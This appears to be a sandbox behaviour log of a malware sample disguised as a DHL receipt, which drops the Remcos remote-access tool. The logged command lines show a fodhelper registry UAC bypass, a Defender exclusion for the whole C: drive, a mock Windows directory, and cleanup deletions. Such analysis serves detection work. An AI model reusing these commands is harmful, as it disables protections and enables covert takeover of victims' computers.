              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pifJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIFJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: archiveint.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
